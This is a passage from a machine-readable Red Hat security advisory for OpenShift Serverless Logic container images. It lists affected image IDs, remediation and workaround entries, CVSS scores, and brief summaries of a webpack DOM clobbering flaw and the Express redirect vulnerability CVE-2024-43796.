"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8023", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.1, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", version: "3.1", }, products: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", }, { cve: "CVE-2024-43796", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:28.106254+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311152", }, ], notes: [ { category: "description", text: "A flaw was found in Express. This vulnerability allows untrusted code execution via passing untrusted user input to response.redirect(), even if the input is sanitized.", title: "Vulnerability description", }, { category: "summary", text: "express: Improper Input Handling in Express Redirects", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43796", }, { category: "external", summary: "RHBZ#2311152", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311152", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43796", url: "https://www.cve.org/CVERecord?id=CVE-2024-43796", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43796", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43796", }, { category: "external", summary: "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553", url: "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553", }, { category: "external", summary: "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx", url: "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx", }, ], release_date: "2024-09-10T15:15:17.510000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-14T00:59:58+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8023", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", 